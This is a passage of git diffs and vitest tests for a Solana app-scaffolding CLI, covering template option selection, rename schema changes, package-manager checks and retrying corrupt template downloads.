+      // the way through gets you a working app
+      initialValue: getInitialValue(results.template),
       message: 'Enter project name',
       validate: (name) => validateProjectName(name ?? ''),
     })

--- a/src/utils/get-prompt-template.ts
+++ b/src/utils/get-prompt-template.ts
@@ -19,14 +19,7 @@ export function getPromptTemplate({ items, options }: { items: MenuItem[]; optio
   }
 }
 
-function getGroupSelectOptions(values: MenuItem[]): SelectOptions<
-  {
-    hint?: string | undefined
-    label: string
-    value: MenuItem
-  }[],
-  MenuItem
-> {
+function getGroupSelectOptions(values: MenuItem[]): SelectOptions<MenuItem> {
   return {
     message: 'Select a group',
     options: values.map((value) => ({
@@ -41,9 +34,7 @@ function selectGroup(values: MenuItem[]): Promise<MenuItem> {
   return select(getGroupSelectOptions(values)) as Promise<MenuItem>
 }
 
-function getTemplateSelectOptions(
-  values: Template[],
-): SelectOptions<{ hint?: string | undefined; label: string; value: Template }[], Template> {
+function getTemplateSelectOptions(values: Template[]): SelectOptions<Template> {
   return {
     message: 'Select a template',
     options: values.map((value) => ({

--- a/src/utils/get-prompts.ts
+++ b/src/utils/get-prompts.ts
@@ -7,9 +7,11 @@ import { MenuItem } from './template-schema'
 
 export function getPrompts({ items, options }: { items: MenuItem[]; options: GetArgsResult }) {
   return group(
+    // The key order determines the prompt order: the template is selected first so it can seed the project name
     {
-      name: getPromptName({ options }),
+      // eslint-disable-next-line sort/object-properties
       template: getPromptTemplate({ items, options }),
+      name: getPromptName({ options }),
     },
     {
       onCancel: () => {

--- a/src/utils/init-script-options.ts
+++ b/src/utils/init-script-options.ts
@@ -2,7 +2,7 @@ import { GetArgsResult } from './get-args-result'
 import { initScriptRenameEntries } from './init-script-rename'
 import { InitScriptOptions } from './init-script-schema'
 
-interface SelectedTemplateOption {
+export interface SelectedTemplateOption {
   name: string
   value: InitScriptOptions[string]
 }
@@ -66,11 +66,7 @@ export function resolveInitScriptOptions(
  * Applies the selected template option transformations and returns their
  * post-create instructions.
  */
-export async function initScriptOptions(
-  args: GetArgsResult,
-  options: InitScriptOptions | undefined,
-): Promise<string[]> {
-  const selected = resolveInitScriptOptions(options, args.templateOptions ?? [])
+export async function initScriptOptions(args: GetArgsResult, selected: SelectedTemplateOption[]): Promise<string[]> {
   for (const option of selected) {
     await initScriptRenameEntries(args, option.value.rename)
   }

--- a/src/utils/init-script-options.ts
+++ b/src/utils/init-script-options.ts
@@ -1,0 +1,78 @@
+import { GetArgsResult } from './get-args-result'
+import { initScriptRenameEntries } from './init-script-rename'
+import { InitScriptOptions } from './init-script-schema'
+
+interface SelectedTemplateOption {
+  name: string
+  value: InitScriptOptions[string]
+}
+
+/**
+ * Resolves requested flags and group defaults from template option metadata.
+ */
+export function resolveInitScriptOptions(
+  options: InitScriptOptions | undefined,
+  requested: string[],
+): SelectedTemplateOption[] {
+  const definitions = options ?? {}
+  const available = Object.keys(definitions)
+  const unknown = requested.filter((name) => !definitions[name])
+  if (unknown.length > 0) {
+    const availableMessage =
+      available.length > 0 ? ` Available options: ${available.map((name) => `--${name}`).join(', ')}.` : ''
+    throw new Error(`Template does not support ${unknown.map((name) => `--${name}`).join(', ')}.${availableMessage}`)
+  }
+
+  const selected = new Set(requested)
+  const requestedGroups = new Set(
+    requested.flatMap((name) => {
+      const group = definitions[name].group
+      return group ? [group] : []
+    }),
+  )
+
+  for (const [name, option] of Object.entries(definitions)) {
+    if (!option.default) {
+      continue
+    }
+    if (!option.group || !requestedGroups.has(option.group)) {
+      selected.add(name)
+    }
+  }
+
+  const selectedOptions = [...selected].map((name) => ({ name, value: definitions[name] }))
+  const groups = new Map<string, string[]>()
+  for (const option of selectedOptions) {
+    if (!option.value.group) {
+      continue
+    }
+    const names = groups.get(option.value.group) ?? []
+    names.push(option.name)
+    groups.set(option.value.group, names)
+  }
+
+  for (const [group, names] of groups) {
+    if (names.length > 1) {
+      throw new Error(
+        `Template options ${names.map((name) => `--${name}`).join(' and ')} are mutually exclusive (group "${group}").`,
+      )
+    }
+  }
+
+  return selectedOptions
+}
+
+/**
+ * Applies the selected template option transformations and returns their
+ * post-create instructions.
+ */
+export async function initScriptOptions(
+  args: GetArgsResult,
+  options: InitScriptOptions | undefined,
+): Promise<string[]> {
+  const selected = resolveInitScriptOptions(options, args.templateOptions ?? [])
+  for (const option of selected) {
+    await initScriptRenameEntries(args, option.value.rename)
+  }
+  return selected.flatMap((option) => option.value.instructions ?? [])
+}

--- a/src/utils/init-script-package-manager.ts
+++ b/src/utils/init-script-package-manager.ts
@@ -1,3 +1,4 @@
+import { log } from '@clack/prompts'
 import { GetArgsResult } from './get-args-result'
 import { getPackageJson } from './get-package-json'
 import { initScriptKey } from './init-script-schema'
@@ -19,8 +20,11 @@ export function initScriptPackageManager(args: GetArgsResult): void {
 
   try {
     getPackageManagerVersion(packageManager, args.targetDirectory)
-  } catch {
-    taskFail(`Template requires ${packageManager}, but ${packageManager} is not installed`)
+  } catch (error) {
+    if (args.verbose) {
+      log.error(`Error checking ${packageManager} availability: ${error}`)
+    }
+    taskFail(`Template requires ${packageManager}, but ${packageManager} is not available`)
     return
   }
 

--- a/src/utils/init-script-rename.ts
+++ b/src/utils/init-script-rename.ts
@@ -73,33 +73,39 @@ function packageNameReplacementValues(from: string, to: string): { fromNames: st
 }
 
 function initScriptRenameReplacementValues(from: string, to: string): { fromNames: string[]; toNames: string[] } {
+  const replacements = new Map<string, string>()
   const fromNames = namesValues(from)
-  let toNames = namesValues(to)
+  const toNames = namesValues(to)
 
-  if (/\s/.test(from)) {
-    const displayName = toDisplayName(to)
-    const displayIndex = fromNames.indexOf(from)
-    if (displayIndex !== -1) {
-      toNames = toNames.map((toName, index) => (index === displayIndex ? displayName : toName))
+  for (const [index, fromName] of fromNames.entries()) {
+    let toName = toNames[index]
+    if (fromName === from) {
+      toName = /\s/.test(from) ? toDisplayName(to) : to
+    }
+    if (!replacements.has(fromName)) {
+      replacements.set(fromName, toName)
     }
   }
 
-  return { fromNames, toNames }
+  return {
+    fromNames: [...replacements.keys()],
+    toNames: [...replacements.values()],
+  }
 }
 
-export async function initScriptRename(args: GetArgsResult, rename?: InitScriptRename, verbose = false) {
-  const tag = `initScriptRename`
+async function renameProject(args: GetArgsResult, verbose: boolean) {
   const { contents } = getPackageJson(args.targetDirectory)
-  // Rename template from package.json to project name throughout the whole project
   if (contents.name) {
     if (args.verbose) {
-      log.warn(`${tag}: renaming template name '${contents.name}' to project name '${args.name}'`)
+      log.warn(`initScriptRename: renaming template name '${contents.name}' to project name '${args.name}'`)
     }
     const { fromNames, toNames } = packageNameReplacementValues(contents.name, args.name)
     await searchAndReplace(args.targetDirectory, fromNames, toNames, args.dryRun, verbose)
   }
+}
 
-  // Return early if there are no renames defined in the init script
+export async function initScriptRenameEntries(args: GetArgsResult, rename?: InitScriptRename) {
+  const tag = `initScriptRename`
   if (!rename) {
     if (args.verbose) {
       log.warn(`${tag}: no renames found`)
@@ -107,20 +113,8 @@ export async function initScriptRename(args: GetArgsResult, rename?: InitScriptR
     return
   }
 
-  // Loop through each word in the rename object
   for (const from of Object.keys(rename)) {
-    // Skip if the 'from' value matches the package.json name (already replaced above)
-    if (from === contents.name) {
-      if (args.verbose) {
-        log.warn(`${tag}: skipping rename for '${from}' as it matches package.json name (already replaced)`)
-      }
-      continue
-    }
-
-    // Get the 'to' property from the rename object
     const to = rename[from].to.replace('{{name}}', args.name)
-
-    // Get the name matrix for the 'from' and the 'to' value
     const { fromNames, toNames } = initScriptRenameReplacementValues(from, to)
 
     for (const path of rename[from].paths) {
@@ -139,4 +133,20 @@ export async function initScriptRename(args: GetArgsResult, rename?: InitScriptR
   if (args.verbose) {
     log.warn(`${tag}: done`)
   }
+}
+
+export async function initScriptRename(args: GetArgsResult, rename?: InitScriptRename, verbose = false) {
+  const { contents } = getPackageJson(args.targetDirectory)
+  await renameProject(args, verbose)
+
+  if (contents.name && rename?.[contents.name]) {
+    const { [contents.name]: _packageName, ...remainingRename } = rename
+    if (args.verbose) {
+      log.warn(`initScriptRename: skipping rename for '${contents.name}' as it matches package.json name`)
+    }
+    await initScriptRenameEntries(args, remainingRename)
+    return
+  }
+
+  await initScriptRenameEntries(args, rename)
 }

--- a/src/utils/init-script-rename.ts
+++ b/src/utils/init-script-rename.ts
@@ -3,7 +3,7 @@ import { join } from 'node:path'
 import { ensureTargetPath } from './ensure-target-path'
 import { GetArgsResult } from './get-args-result'
 import { getPackageJson } from './get-package-json'
-import { InitScriptRename } from './init-script-schema'
+import { InitScriptRename, InitScriptRenameEntry } from './init-script-schema'
 import { searchAndReplace } from './search-and-replace'
 import { namesValues } from './vendor/names'
 
@@ -46,6 +46,11 @@ function toPascalName(name: string): string {
 
 function toSnakeName(name: string): string {
   return getNameSegments(name).join('_').toLowerCase()
+}
+
+function renameEntryPaths(entry: InitScriptRenameEntry): string[] {
+  // `paths` is the deprecated spelling of `in`; the schema guarantees exactly one of them is set
+  return entry.in ?? entry.paths ?? []
 }
 
 function packageNameReplacementValues(from: string, to: string): { fromNames: string[]; toNames: string[] } {
@@ -113,11 +118,18 @@ export async function initScriptRenameEntries(args: GetArgsResult, rename?: Init
     return
   }
 
+  const deprecated = Object.keys(rename).filter((from) => rename[from].paths)
+  if (deprecated.length > 0) {
+    log.warn(
+      `${tag}: 'paths' is deprecated and is removed in the next major version, use 'in' instead: ${deprecated.join(', ')}`,
+    )
+  }
+
   for (const from of Object.keys(rename)) {
     const to = rename[from].to.replace('{{name}}', args.name)
     const { fromNames, toNames } = initScriptRenameReplacementValues(from, to)
 
-    for (const path of rename[from].paths) {
+    for (const path of renameEntryPaths(rename[from])) {
       const targetPath = join(args.targetDirectory, path)
       if (!(await ensureTargetPath(targetPath))) {
         log.error(`${tag}: target does not exist ${targetPath}`)

--- a/src/utils/init-script-schema.ts
+++ b/src/utils/init-script-schema.ts
@@ -24,8 +24,19 @@ export const InitScriptSchemaRename = z.record(
   }),
 )
 
+export const InitScriptSchemaOption = z.object({
+  default: z.boolean().optional(),
+  description: z.string().optional(),
+  group: z.string().min(1).optional(),
+  instructions: InitScriptSchemaInstructions.optional(),
+  rename: InitScriptSchemaRename.optional(),
+})
+
+export const InitScriptSchemaOptions = z.record(z.string().regex(/^[a-z][a-z0-9-]*$/), InitScriptSchemaOption)
+
 export const InitScriptSchema = z.object({
   instructions: InitScriptSchemaInstructions.optional(),
+  options: InitScriptSchemaOptions.optional(),
   packageManager: InitScriptSchemaPackageManager.optional(),
   rename: InitScriptSchemaRename.optional(),
   skills: InitScriptSchemaSkills.optional(),
@@ -33,6 +44,8 @@ export const InitScriptSchema = z.object({
 })
 
 export type InitScriptInstructions = z.infer<typeof InitScriptSchemaInstructions>
+export type InitScriptOption = z.infer<typeof InitScriptSchemaOption>
+export type InitScriptOptions = z.infer<typeof InitScriptSchemaOptions>
 export type InitScriptPackageManager = z.infer<typeof InitScriptSchemaPackageManager>
 export type InitScriptRename = z.infer<typeof InitScriptSchemaRename>
 export type InitScriptSkills = z.infer<typeof InitScriptSchemaSkills>

--- a/src/utils/init-script-schema.ts
+++ b/src/utils/init-script-schema.ts
@@ -16,14 +16,35 @@ export const InitScriptSchemaVersions = z.object({
   solana: z.string().optional(),
 })
 
-export const InitScriptSchemaRename = z.record(
-  z.string(),
-  z.object({
-    // TODO: Rename 'paths' to 'in' (breaking change)
-    paths: z.array(z.string()),
+export const InitScriptSchemaRenameEntry = z
+  .object({
+    in: z.array(z.string()).optional(),
+    /** @deprecated Use `in` instead. Support for `paths` is removed in the next major version. */
+    paths: z.array(z.string()).optional(),
     to: z.string(),
-  }),
-)
+  })
+  .check((payload) => {
+    const { in: paths, paths: deprecatedPaths } = payload.value
+
+    if (paths && deprecatedPaths) {
+      payload.issues.push({
+        code: 'custom',
+        input: payload.value,
+        message: `Use either 'in' or 'paths', not both ('paths' is deprecated, use 'in')`,
+      })
+      return
+    }
+
+    if (!paths && !deprecatedPaths) {
+      payload.issues.push({
+        code: 'custom',
+        input: payload.value,
+        message: `Missing 'in': list the paths to search for this rename`,
+      })
+    }
+  })
+
+export const InitScriptSchemaRename = z.record(z.string(), InitScriptSchemaRenameEntry)
 
 export const InitScriptSchemaOption = z.object({
   default: z.boolean().optional(),
@@ -49,5 +70,6 @@ export type InitScriptOption = z.infer<typeof InitScriptSchemaOption>
 export type InitScriptOptions = z.infer<typeof InitScriptSchemaOptions>
 export type InitScriptPackageManager = z.infer<typeof InitScriptSchemaPackageManager>
 export type InitScriptRename = z.infer<typeof InitScriptSchemaRename>
+export type InitScriptRenameEntry = z.infer<typeof InitScriptSchemaRenameEntry>
 export type InitScriptSkills = z.infer<typeof InitScriptSchemaSkills>
 export type InitScriptVersions = z.infer<typeof InitScriptSchemaVersions>

--- a/src/utils/init-script-schema.ts
+++ b/src/utils/init-script-schema.ts
@@ -1,4 +1,4 @@
-import { z } from 'zod/v3'
+import { z } from 'zod'
 import { packageManagers } from './vendor/package-manager'
 
 // This is the key used in package.json to store the init script
@@ -17,6 +17,7 @@ export const InitScriptSchemaVersions = z.object({
 })
 
 export const InitScriptSchemaRename = z.record(
+  z.string(),
   z.object({
     // TODO: Rename 'paths' to 'in' (breaking change)
     paths: z.array(z.string()),

--- a/src/utils/init-script-schema.ts
+++ b/src/utils/init-script-schema.ts
@@ -52,6 +52,14 @@ export const InitScriptSchemaOption = z.object({
   group: z.string().min(1).optional(),
   instructions: InitScriptSchemaInstructions.optional(),
   rename: InitScriptSchemaRename.optional(),
+  // A package.json script to run when this option is selected, optionally followed by arguments.
+  // The value reaches a shell, so shell metacharacters are rejected rather than escaped. This also
+  // rules out quoted arguments, so an argument cannot contain a space; put those in the script itself.
+  run: z
+    .string()
+    .min(1)
+    .regex(/^[\w\s.:@/=,+-]+$/, 'run may only contain letters, digits, whitespace and the characters . : @ / = , + - _')
+    .optional(),
 })
 
 export const InitScriptSchemaOptions = z.record(z.string().regex(/^[a-z][a-z0-9-]*$/), InitScriptSchemaOption)
@@ -65,6 +73,7 @@ export const InitScriptSchema = z.object({
   versions: InitScriptSchemaVersions.optional(),
 })
 
+export type InitScript = z.infer<typeof InitScriptSchema>
 export type InitScriptInstructions = z.infer<typeof InitScriptSchemaInstructions>
 export type InitScriptOption = z.infer<typeof InitScriptSchemaOption>
 export type InitScriptOptions = z.infer<typeof InitScriptSchemaOptions>

--- a/src/utils/remove-incompatible-package-manager.ts
+++ b/src/utils/remove-incompatible-package-manager.ts
@@ -1,0 +1,36 @@
+import { writeFileSync } from 'node:fs'
+import { getPackageJson } from './get-package-json'
+import { PackageManager } from './vendor/package-manager'
+
+/**
+ * Removes the `packageManager` field from the generated app's `package.json`
+ * when it does not match the selected package manager.
+ *
+ * Templates can pin a `packageManager` (e.g. `pnpm@10.15.1`). Managers such as
+ * pnpm and yarn error when they encounter an incompatible value, so a template
+ * that pins a different manager than the one the user selected would otherwise
+ * break installation (see #100).
+ *
+ * @param targetDirectory - The directory containing the generated app's `package.json`.
+ * @param packageManager - The package manager the user selected.
+ * @returns The removed `packageManager` value, or `undefined` if nothing was removed.
+ */
+export function removeIncompatiblePackageManager(
+  targetDirectory: string,
+  packageManager: PackageManager,
+): string | undefined {
+  const { contents, path } = getPackageJson(targetDirectory)
+  const value = contents.packageManager
+  if (!value) {
+    return undefined
+  }
+  // `packageManager` is formatted as `<name>@<version>` (e.g. `pnpm@10.15.1`).
+  const [name] = value.split('@')
+  if (name === packageManager) {
+    return undefined
+  }
+  const updated = { ...contents }
+  delete updated.packageManager
+  writeFileSync(path, `${JSON.stringify(updated, undefined, 2)}\n`)
+  return value
+}

--- a/src/utils/search-and-replace.ts
+++ b/src/utils/search-and-replace.ts
@@ -1,4 +1,4 @@
-import { readdir, readFile, rename, writeFile } from 'node:fs/promises'
+import { lstat, readdir, readFile, rename, writeFile } from 'node:fs/promises'
 import { join } from 'node:path'
 
 const EXCLUDED_DIRECTORIES = new Set(['dist', 'coverage', 'node_modules', '.git', 'tmp'])
@@ -124,6 +124,15 @@ export async function searchAndReplace(
   }
 
   try {
+    const rootStats = await lstat(rootFolder)
+    if (rootStats.isFile()) {
+      await processFile(rootFolder)
+      if (isVerbose) {
+        console.log(isDryRun ? 'Dry run completed' : 'Search and replace completed')
+      }
+      return
+    }
+
     await processDirectory(rootFolder)
     await renamePaths(rootFolder)
     if (isVerbose) {

--- a/src/utils/validate-project-name.ts
+++ b/src/utils/validate-project-name.ts
@@ -1,8 +1,14 @@
 import { existsSync } from 'node:fs'
 
+// Checks the shape of a name without touching the filesystem, for callers that want to propose a
+// name rather than accept one. Keep this in sync with the first check in `validateProjectName`.
+export function isValidProjectNameFormat(name: string): boolean {
+  return /^[\w-]+$/i.test(name)
+}
+
 export function validateProjectName(name: string): string | undefined {
   // Name must be a valid directory name
-  if (!/^[\w-]+$/i.test(name)) {
+  if (!isValidProjectNameFormat(name)) {
     return 'Please enter a valid directory name (alphanumeric characters and dashes only)'
   }
   // Name must be at least 1 character long

--- a/src/utils/validate-project-name.ts
+++ b/src/utils/validate-project-name.ts
@@ -1,6 +1,6 @@
 import { existsSync } from 'node:fs'
 
-export function validateProjectName(name: string): string | void {
+export function validateProjectName(name: string): string | undefined {
   // Name must be a valid directory name
   if (!/^[\w-]+$/i.test(name)) {
     return 'Please enter a valid directory name (alphanumeric characters and dashes only)'

--- a/src/utils/vendor/child-process-utils.ts
+++ b/src/utils/vendor/child-process-utils.ts
@@ -11,7 +11,6 @@
  */
 import { exec } from 'node:child_process'
 import { writeFileSync } from 'node:fs'
-import { join } from 'node:path'
 
 export class CreateAppError extends Error {
   constructor(
@@ -29,7 +28,8 @@ export function execAndWait(command: string, cwd: string) {
     exec(command, { cwd, env: { ...process.env } }, (error, stdout, stderr) => {
       if (error) {
         const errorStr = stderr && stderr.trim().length > 0 ? stderr : `${error}`
-        const logFile = join(cwd, 'error.log')
+        // Written next to `cwd` instead of inside it so it survives cleanup of a failed target directory
+        const logFile = `${cwd}.error.log`
         writeFileSync(logFile, `${stdout}\n${errorStr}`)
         const message = errorStr.trim().length > 0 ? errorStr : `An error occurred while running ${command}`
         rej(new CreateAppError(message, error.code, logFile))

--- a/test/corrupt-archive-error.test.ts
+++ b/test/corrupt-archive-error.test.ts
@@ -1,0 +1,72 @@
+import { homedir, tmpdir } from 'node:os'
+import { resolve } from 'node:path'
+import { afterEach, describe, expect, it, vi } from 'vitest'
+import {
+  corruptArchiveMessage,
+  isCorruptArchiveError,
+  templateCacheDirectory,
+} from '../src/utils/corrupt-archive-error'
+
+describe('isCorruptArchiveError', () => {
+  it('detects the zlib error tar throws for a truncated tarball', () => {
+    // The exact shape reported in #256.
+    const error = Object.assign(new Error('zlib: unexpected end of file'), { name: 'ZlibError' })
+    expect(isCorruptArchiveError(error)).toBe(true)
+  })
+
+  it('detects tar and zlib error codes', () => {
+    expect(isCorruptArchiveError(Object.assign(new Error('bad archive'), { code: 'TAR_BAD_ARCHIVE' }))).toBe(true)
+    expect(isCorruptArchiveError(Object.assign(new Error('buffer error'), { code: 'Z_BUF_ERROR' }))).toBe(true)
+    expect(isCorruptArchiveError(Object.assign(new Error('data error'), { code: 'Z_DATA_ERROR' }))).toBe(true)
+  })
+
+  it('detects a non-gzip payload', () => {
+    expect(isCorruptArchiveError(new Error('not a gzip file'))).toBe(true)
+  })
+
+  it('ignores unrelated failures', () => {
+    expect(isCorruptArchiveError(new Error('Destination /tmp/app already exists.'))).toBe(false)
+    expect(isCorruptArchiveError(Object.assign(new Error('offline'), { code: 'ENOTFOUND' }))).toBe(false)
+    expect(isCorruptArchiveError(undefined)).toBe(false)
+  })
+})
+
+describe('templateCacheDirectory', () => {
+  const platform = process.platform
+  const xdgCacheHome = process.env.XDG_CACHE_HOME
+
+  afterEach(() => {
+    Object.defineProperty(process, 'platform', { value: platform })
+    if (xdgCacheHome === undefined) {
+      delete process.env.XDG_CACHE_HOME
+    } else {
+      process.env.XDG_CACHE_HOME = xdgCacheHome
+    }
+    vi.unstubAllEnvs()
+  })
+
+  it('uses the temp directory on Windows, matching giget', () => {
+    Object.defineProperty(process, 'platform', { value: 'win32' })
+    expect(templateCacheDirectory()).toBe(resolve(tmpdir(), 'giget'))
+  })
+
+  it('honours XDG_CACHE_HOME elsewhere', () => {
+    Object.defineProperty(process, 'platform', { value: 'linux' })
+    process.env.XDG_CACHE_HOME = '/custom/cache'
+    expect(templateCacheDirectory()).toBe(resolve('/custom/cache', 'giget'))
+  })
+
+  it('falls back to the home cache directory', () => {
+    Object.defineProperty(process, 'platform', { value: 'linux' })
+    delete process.env.XDG_CACHE_HOME
+    expect(templateCacheDirectory()).toBe(resolve(homedir(), '.cache/giget'))
+  })
+})
+
+describe('corruptArchiveMessage', () => {
+  it('names the template and the directory to clear', () => {
+    const message = corruptArchiveMessage('gh:solana-foundation/templates/nextjs-anchor')
+    expect(message).toContain('gh:solana-foundation/templates/nextjs-anchor')
+    expect(message).toContain(templateCacheDirectory())
+  })
+})

--- a/test/create-app-task-clone-template.test.ts
+++ b/test/create-app-task-clone-template.test.ts
@@ -1,0 +1,63 @@
+import { downloadTemplate } from 'giget'
+import { beforeEach, describe, expect, it, vi } from 'vitest'
+import { templateCacheDirectory } from '../src/utils/corrupt-archive-error'
+import { createAppTaskCloneTemplate } from '../src/utils/create-app-task-clone-template'
+import { GetArgsResult } from '../src/utils/get-args-result'
+import { taskFail } from '../src/utils/vendor/clack-tasks'
+
+vi.mock('giget', () => ({ downloadTemplate: vi.fn() }))
+vi.mock('node:fs', () => ({ cpSync: vi.fn(), existsSync: vi.fn(() => false), mkdirSync: vi.fn() }))
+vi.mock('node:fs/promises', () => ({ readdir: vi.fn(async () => ['package.json']) }))
+vi.mock('../src/utils/vendor/clack-tasks', () => ({ taskFail: vi.fn() }))
+
+function zlibError() {
+  // The failure reported in #256: giget extracted a truncated cached tarball.
+  return Object.assign(new Error('zlib: unexpected end of file'), { name: 'ZlibError' })
+}
+
+const args = {
+  targetDirectory: '/tmp/app',
+  template: { id: 'gh:solana-foundation/templates/nextjs-anchor' },
+  verbose: false,
+} as GetArgsResult
+
+describe('createAppTaskCloneTemplate: corrupt cached archive (#256)', () => {
+  const result = vi.fn((value) => value)
+
+  beforeEach(() => {
+    vi.clearAllMocks()
+  })
+
+  it('retries the download once when the cached archive is corrupt', async () => {
+    vi.mocked(downloadTemplate)
+      .mockRejectedValueOnce(zlibError())
+      .mockResolvedValueOnce({ dir: '/tmp/app' } as Awaited<ReturnType<typeof downloadTemplate>>)
+
+    await createAppTaskCloneTemplate(args).task(result)
+
+    expect(vi.mocked(downloadTemplate)).toHaveBeenCalledTimes(2)
+    // The retry clears whatever the failed attempt left in the target directory.
+    expect(vi.mocked(downloadTemplate).mock.calls[1][1]).toMatchObject({ forceClean: true })
+    expect(vi.mocked(taskFail)).not.toHaveBeenCalled()
+  })
+
+  it('surfaces an actionable message when the retry is also corrupt', async () => {
+    vi.mocked(downloadTemplate).mockRejectedValue(zlibError())
+
+    await createAppTaskCloneTemplate(args).task(result)
+
+    expect(vi.mocked(downloadTemplate)).toHaveBeenCalledTimes(2)
+    const message = vi.mocked(taskFail).mock.calls[0][0] as string
+    expect(message).toContain(templateCacheDirectory())
+    expect(message).toContain('corrupt')
+  })
+
+  it('does not retry unrelated download failures', async () => {
+    vi.mocked(downloadTemplate).mockRejectedValue(new Error('Destination /tmp/app already exists.'))
+
+    await createAppTaskCloneTemplate(args).task(result)
+
+    expect(vi.mocked(downloadTemplate)).toHaveBeenCalledTimes(1)
+    expect(vi.mocked(taskFail)).toHaveBeenCalledOnce()
+  })
+})

--- a/test/create-app-task-install-dependencies.test.ts
+++ b/test/create-app-task-install-dependencies.test.ts
@@ -1,0 +1,93 @@
+import { existsSync } from 'node:fs'
+import { access, mkdir, mkdtemp, rm, writeFile } from 'node:fs/promises'
+import { tmpdir } from 'node:os'
+import { join } from 'node:path'
+import { afterEach, describe, expect, it, vi } from 'vitest'
+import { createAppTaskInstallDependencies } from '../src/utils/create-app-task-install-dependencies'
+import type { GetArgsResult } from '../src/utils/get-args-result'
+import { execAndWait } from '../src/utils/vendor/child-process-utils'
+
+const mockedFs = vi.hoisted(() => ({ disappearingPath: undefined as string | undefined }))
+
+vi.mock('node:fs', async (importOriginal) => {
+  const actual = await importOriginal<typeof import('node:fs')>()
+  return {
+    ...actual,
+    existsSync: vi.fn((path) => path === mockedFs.disappearingPath || actual.existsSync(path)),
+  }
+})
+
+vi.mock('../src/utils/vendor/child-process-utils', () => ({
+  execAndWait: vi.fn().mockResolvedValue({ code: 0, stdout: '' }),
+}))
+
+const temporaryDirectories: string[] = []
+
+afterEach(async () => {
+  mockedFs.disappearingPath = undefined
+  vi.clearAllMocks()
+  await Promise.all(temporaryDirectories.splice(0).map((directory) => rm(directory, { force: true, recursive: true })))
+})
+
+describe('createAppTaskInstallDependencies', () => {
+  it('removes lockfiles from other package managers without a shell command', async () => {
+    const targetDirectory = await mkdtemp(join(tmpdir(), 'create-solana-dapp-install-'))
+    temporaryDirectories.push(targetDirectory)
+    const selectedLockFile = join(targetDirectory, 'package-lock.json')
+    const staleLockFile = join(targetDirectory, 'pnpm-lock.yaml')
+    await Promise.all([writeFile(selectedLockFile, ''), writeFile(staleLockFile, '')])
+
+    const task = createAppTaskInstallDependencies({
+      packageManager: 'npm',
+      skipInstall: false,
+      targetDirectory,
+      verbose: false,
+    } as GetArgsResult)
+
+    await task.task((value) => value)
+
+    expect(existsSync(selectedLockFile)).toBe(true)
+    expect(existsSync(staleLockFile)).toBe(false)
+    expect(execAndWait).toHaveBeenCalledOnce()
+    expect(execAndWait).toHaveBeenCalledWith(expect.stringMatching(/^npm install /), targetDirectory)
+  })
+
+  it('continues installation when a stale lockfile disappears before removal', async () => {
+    const targetDirectory = await mkdtemp(join(tmpdir(), 'create-solana-dapp-install-'))
+    temporaryDirectories.push(targetDirectory)
+    const selectedLockFile = join(targetDirectory, 'package-lock.json')
+    const staleLockFile = join(targetDirectory, 'pnpm-lock.yaml')
+    await writeFile(selectedLockFile, '')
+    mockedFs.disappearingPath = staleLockFile
+
+    const task = createAppTaskInstallDependencies({
+      packageManager: 'npm',
+      skipInstall: false,
+      targetDirectory,
+      verbose: false,
+    } as GetArgsResult)
+
+    await task.task((value) => value)
+
+    await expect(access(selectedLockFile)).resolves.toBeUndefined()
+    await expect(access(staleLockFile)).rejects.toThrow()
+    expect(execAndWait).toHaveBeenCalledOnce()
+    expect(execAndWait).toHaveBeenCalledWith(expect.stringMatching(/^npm install /), targetDirectory)
+  })
+
+  it('does not suppress unexpected lockfile removal errors', async () => {
+    const targetDirectory = await mkdtemp(join(tmpdir(), 'create-solana-dapp-install-'))
+    temporaryDirectories.push(targetDirectory)
+    await mkdir(join(targetDirectory, 'pnpm-lock.yaml'))
+
+    const task = createAppTaskInstallDependencies({
+      packageManager: 'npm',
+      skipInstall: false,
+      targetDirectory,
+      verbose: false,
+    } as GetArgsResult)
+
+    await expect(task.task((value) => value)).rejects.toThrow()
+    expect(execAndWait).not.toHaveBeenCalled()
+  })
+})

--- a/test/create-app-task-install-skills.test.ts
+++ b/test/create-app-task-install-skills.test.ts
@@ -1,7 +1,7 @@
 import { log } from '@clack/prompts'
 import { fs, vol } from 'memfs'
 import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest'
-import { createAppTaskInstallDevSkill } from '../src/utils/create-app-task-install-dev-skill'
+import { createAppTaskInstallSkills } from '../src/utils/create-app-task-install-skills'
 import { GetArgsResult } from '../src/utils/get-args-result'
 import { initScriptKey } from '../src/utils/init-script-schema'
 import { execAndWait } from '../src/utils/vendor/child-process-utils'
@@ -17,7 +17,7 @@ vi.mock('@clack/prompts', () => ({
   },
 }))
 
-describe('createAppTaskInstallDevSkill', () => {
+describe('createAppTaskInstallSkills', () => {
   const targetDirectory = '/template'
   const packageJsonPath = `${targetDirectory}/package.json`
 
@@ -126,13 +126,13 @@ describe('createAppTaskInstallDevSkill', () => {
   })
 
   it('should disable the task when install is skipped', () => {
-    const task = createAppTaskInstallDevSkill({ ...baseArgs, skipInstall: true })
+    const task = createAppTaskInstallSkills({ ...baseArgs, skipInstall: true })
 
     expect(task.enabled).toBe(false)
   })
 
   async function runTask(args = baseArgs) {
-    return createAppTaskInstallDevSkill(args).task((value) => value)
+    return createAppTaskInstallSkills(args).task((value) => value)
   }
 
   function writePackageJson(init?: unknown) {

--- a/test/create-app-task-run-init-script.test.ts
+++ b/test/create-app-task-run-init-script.test.ts
@@ -1,0 +1,74 @@
+import { beforeEach, describe, expect, it, vi } from 'vitest'
+import { createAppTaskRunInitScript } from '../src/utils/create-app-task-run-init-script'
+import { GetArgsResult } from '../src/utils/get-args-result'
+import { initScriptDelete } from '../src/utils/init-script-delete'
+import { initScriptOptions } from '../src/utils/init-script-options'
+import { initScriptRename } from '../src/utils/init-script-rename'
+import { InitScript } from '../src/utils/init-script-schema'
+import { initScriptVersion } from '../src/utils/init-script-version'
+
+vi.mock('../src/utils/init-script-delete', () => ({ initScriptDelete: vi.fn() }))
+vi.mock('../src/utils/init-script-options', () => ({ initScriptOptions: vi.fn() }))
+vi.mock('../src/utils/init-script-rename', () => ({ initScriptRename: vi.fn() }))
+vi.mock('../src/utils/init-script-version', () => ({ initScriptVersion: vi.fn() }))
+vi.mock('@clack/prompts', () => ({
+  log: {
+    error: vi.fn(),
+    warn: vi.fn(),
+  },
+}))
+
+describe('createAppTaskRunInitScript', () => {
+  const args: GetArgsResult = {
+    app: { name: 'test-app', version: '1.0.0' },
+    dryRun: false,
+    name: 'test-project',
+    packageManager: 'pnpm',
+    skipGit: false,
+    skipInit: false,
+    skipInstall: false,
+    targetDirectory: '/template',
+    template: { description: 'description', name: 'basic', repository: '/template' },
+    verbose: false,
+  }
+
